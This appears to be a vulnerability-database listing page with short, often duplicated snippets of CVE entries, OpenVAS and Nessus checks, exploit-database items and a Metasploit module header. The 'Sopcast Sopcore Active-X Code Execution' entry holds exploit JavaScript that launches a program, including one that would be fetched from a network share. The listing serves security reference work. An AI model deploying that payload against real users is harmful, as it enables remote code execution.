Denial of Service (DoS)

Overview Affected versions of this package are vulnerable to Denial of Service DoS. The asn1bufimbed function in the ASN.1 decoder in MIT Kerberos 5 aka krb5 1.6.3, when PK-INIT is used, allows remote attackers to cause a denial of service application crash via a crafted length value that trigger...

Mandriva Update for sound-scripts MDVA-2008:168 (sound-scripts)

Check for the Version of sound-scripts OpenVAS Vulnerability Test Mandriva Update for sound-scripts MDVA-2008:168 sound-scripts Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/...

Mandriva Update for initscripts MDKA-2007:031 (initscripts)

Check for the Version of initscripts OpenVAS Vulnerability Test Mandriva Update for initscripts MDKA-2007:031 initscripts Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or...

Mandriva Update for sound-scripts MDVA-2008:168 (sound-scripts)

Check for the Version of sound-scripts OpenVAS Vulnerability Test Mandriva Update for sound-scripts MDVA-2008:168 sound-scripts Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/...

OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...

OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...

Ubuntu USN-730-1 (libpng)

The remote host is missing an update to libpng announced via advisory USN-730-1. OpenVAS Vulnerability Test $Id: ubuntu7301.nasl 7969 2017-12-01 09:23:16Z santu $ $Id: ubuntu7301.nasl 7969 2017-12-01 09:23:16Z santu $ Description: Auto-generated from advisory USN-730-1 libpng Authors: Thomas Rein...

Ubuntu: Security Advisory (USN-730-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Sopcast Sopcore Active-X Code Execution

window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...

Linux Kernel 2.6.x - sock.c SO_BSDCOMPAT Option Information Disclosure

Linux Kernel 2.6.x - sock.c SOBSDCOMPAT Option Information Disclosure / source: https://www.securityfocus.com/bid/33846/info The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible...

Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure

/ source: https://www.securityfocus.com/bid/33846/info The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation. Successful exploits will allow attackers to view portions of...

Design/Logic Flaw

The Remote Apple Events server in Apple Mac OS X 10.4.11 and 10.5.6 does not properly initialize a buffer, which allows remote attackers to read portions of memory...

CVE-2009-0018

CVE-2009-0018 affects Apple Mac OS X 10.4.11 and 10.5.6 via the Remote Apple Events server. The vulnerability stems from improper initialization of a buffer, enabling remote attackers to read portions of memory over the network. The NVD entry assigns a CVSSv2 base score of 7.8 (HIGH) with network...

Wardialer

Scan for dial-up systems that are connected to modems and answer telephony indials. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'zlib' Extend Object class to include savetofile and loadfromfile methods cla...

Design/Logic Flaw

PHP 5 before 5.2.7 does not properly initialize the pageuid and pagegid global variables for use by the SAPI phpgetuid function, which allows context-dependent attackers to bypass safemode restrictions via variable settings that are intended to be restricted to root, as demonstrated by a setting ...

CVE-2008-5624

CVE-2008-5624 affects PHP 5 before 5.2.7 where page_uid/page_gid globals were not properly initialized for php_getuid, enabling context-dependent attackers to bypass safe_mode via error_log settings. The public record in the initial description confirms the vulnerability and its impact on permiss...

CVE-2008-5624

PHP 5 before 5.2.7 does not properly initialize the pageuid and pagegid global variables for use by the SAPI phpgetuid function, which allows context-dependent attackers to bypass safemode restrictions via variable settings that are intended to be restricted to root, as demonstrated by a setting ...

CVE-2008-5624

PHP 5 before 5.2.7 does not properly initialize the pageuid and pagegid global variables for use by the SAPI phpgetuid function, which allows context-dependent attackers to bypass safemode restrictions via variable settings that are intended to be restricted to root, as demonstrated by a setting ...

PHP 5 < 5.2.7 Multiple Vulnerabilities

According to its banner, the version of PHP installed on the remote host is prior to 5.2.7. It is, therefore, affected by multiple vulnerabilities : - There is a buffer overflow flaw in the bundled PCRE library that allows a denial of service attack. CVE-2008-2371 - Multiple directory traversal...

openSUSE 10 Security Update : seamonkey (seamonkey-5815)

This update brings the Mozilla SeaMonkey browser to version 1.1.13. It fixes following security issues : CVE-2008-0017 / MFSA 2008-54 : The http-index-format MIME type parser nsDirIndexParser in Firefox 3.x before 3.0.4, Firefox 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13 does not check...